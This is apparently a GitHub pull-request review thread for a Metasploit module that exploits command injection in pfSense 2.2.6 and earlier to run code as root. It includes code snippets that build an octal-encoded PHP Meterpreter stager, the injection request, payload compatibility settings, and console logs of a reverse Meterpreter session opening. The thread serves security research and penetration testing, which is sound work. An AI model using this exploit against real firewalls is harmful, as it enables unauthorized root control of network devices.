pfsense graph <= 2.2.6 exploit #9362
Conversation
|
Please add module docs to this |
|
added module docs |
|
I have some pfsense vms from the modules I wrote, so I'll give this a test later today |
|
Sounds great thanks :) |
| end | ||
| # If the device isn't fully setup, you get stuck at redirects to wizard.php | ||
| # however, this does NOT stop exploitation strangely | ||
| print_error("pfSense version not detected or wizard still enabled.") |
| filename = rand_text_alpha(rand(20)) | ||
|
|
||
| # generate the PHP meterpreter payload | ||
| stager = "echo \'<?php " |
| # don't look | ||
| complete_stage = "" | ||
| for i in 0..(stager.length()-1) | ||
| if "#{version}" =~ /2.2/ |
There was a problem hiding this comment.
This can be shortened.
if version.to_s =~ /2.2/
complete_stage << '\\'
end
complete_stage << "\\#{stager[i].ord.to_s(8)}"
| begin | ||
| cookie = login | ||
| version = detect_version(cookie) | ||
| filename = rand_text_alpha(rand(20)) |
There was a problem hiding this comment.
20 seems excessive, maybe 8 or 10?
| 'uri' => '/status_rrd_graph_img.php', | ||
| 'method' => 'GET', | ||
| 'headers' => { | ||
| 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0', |
There was a problem hiding this comment.
I don't think all of these headers are required.
My guess is the following could be removed:
- user-agent
- Accept
- Accept-Language
- Accept-Encoding
- Origin
- Connection
| if res && res.code == 200 | ||
| print_status("Triggering the payload, root shell incoming...") | ||
| else | ||
| print_error("Failed to upload the initial payload...") |
| 'uri' => '/status_rrd_graph_img.php', | ||
| 'method' => 'GET', | ||
| 'headers' => { | ||
| 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0', |
There was a problem hiding this comment.
you can prob remove a bunch of these headers
| ---- --------------- -------- ----------- | ||
| PASSWORD pfsense yes Password to login with | ||
| Proxies no A proxy chain of format type:host:port[,type:host:port][...] | ||
| RHOST 192.168.75.132 yes The target address |
There was a problem hiding this comment.
Typically I blank out the lhost to be 1.1.1.1 and rhost to 2.2.2.2, not only does it protect potential customer privacy (i see its a VM here), but saves a few characters as well
| [*] Sending stage (37543 bytes) to 192.168.75.132 | ||
| [*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.132:34381) at 2018-01-01 02:07:03 -0600 | ||
|
|
||
| meterpreter > getuid |
There was a problem hiding this comment.
usually i thorw a uname -a here too, shows the kernel and architecture. On a set image it isn't as important, but just something for the future
| ### pfSense Community Edition 2.2.6-RELEASE | ||
|
|
||
| ``` | ||
| msf exploit(unix/http/pfsense_graph_injection_exec) > options |
There was a problem hiding this comment.
Typically I prefer seeing the options being set ie:
use unix/http/pfesense_graph_injection_exec
set rhost ...
set ...
That takes less lines and shows any non-defaults being set as opposed to show options. Just for future note
|
I added the requested changes and tested |
|
Against my 2.2.6: php reverse meterp looks good: php/bind_perl fails. doesn't seem to be a firewall thing since other binds dont fail. Either the perl is not compatible, or something else is going on. bind meterp is good bind php is no good reverse perl also fails. In the other pfsense module, you see i specified only allowed perl and openssl payloads because all the other ones seemed to fail. You'll want to go through and double check which work and which dont and either debug to figure out why, or exclude them. |
|
So, if I wanted to only allow 'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'reverse_tcp',
'RequiredCmd' => 'php meterpreter',
}
}, |
|
you set the bind shell port to 80, so when it connected it went to the default web server, assumed it was meterp (incorrectly) and acted like the session was open even though it wasn't. I'm not 100% familiar with this portion of MSF and modifying which payloads are accepted for non-cmd payloads. |
|
oh yea, another thing, you may want to look into register the php page that was created for cleanup so its automatically removed. |
|
Alright I went ahead and pushed some changes (thank you for recommending FileDropper). When testing the allowed payloads all seem to work (now). The only issue I have faced is when using php/meterpreter/reverse_tcpphp/download_execphp/execphp/meterpreter_reverse_tcp <--- Failphp/reverse_perl (without cleanup)php/reverse_perl (with cleanup)php/reverse_php |
|
Oh I forgot to mention I also changed line 128 filename = rand_text_alpha(rand(1..10))When using rand(10) there were cases where the payload would be uploaded as ' '. Which of course would mean nothing gets uploaded. |
|
strangely php/meterpreter/reverse_tcp isn't listed for me as a payload. |
| 'Space' => 6000, | ||
| 'Compat' => | ||
| { | ||
| 'Arch' => 'php', |
There was a problem hiding this comment.
if you get rid of this line, the staged meterpreters show back up. I think thats the way to go at this point and with that last change i'll be happy to land.
|
Alright I went ahead and removed the requested line. |
|
nice work! Welcome to being a contributor 🎈 🎉 . |
Release NotesThis module adds an exploit against PFSense firewalls which results in RCE. |
|
Thank you for all the help 😄 ! |
Description
This module exploits a vulnerability in pfSense version 2.2.6 and before which allows an authenticated user to execute arbitrary operating system commands as root.
Vulnerable Application
This module has been tested successfully on version 2.2.6-RELEASE, 2.2.5-RELEASE, and 2.1.3-RELEASE
Installers:
Verification Steps
msfconsoleuse exploit/unix/http/pfsense_graph_injection_execset RHOST [IP]set USERNAME [username]set PASSWORD [password]set LHOST [IP]exploitScenarios
pfSense Community Edition 2.2.6-RELEASE
pfSense Community Edition 2.1.3-RELEASE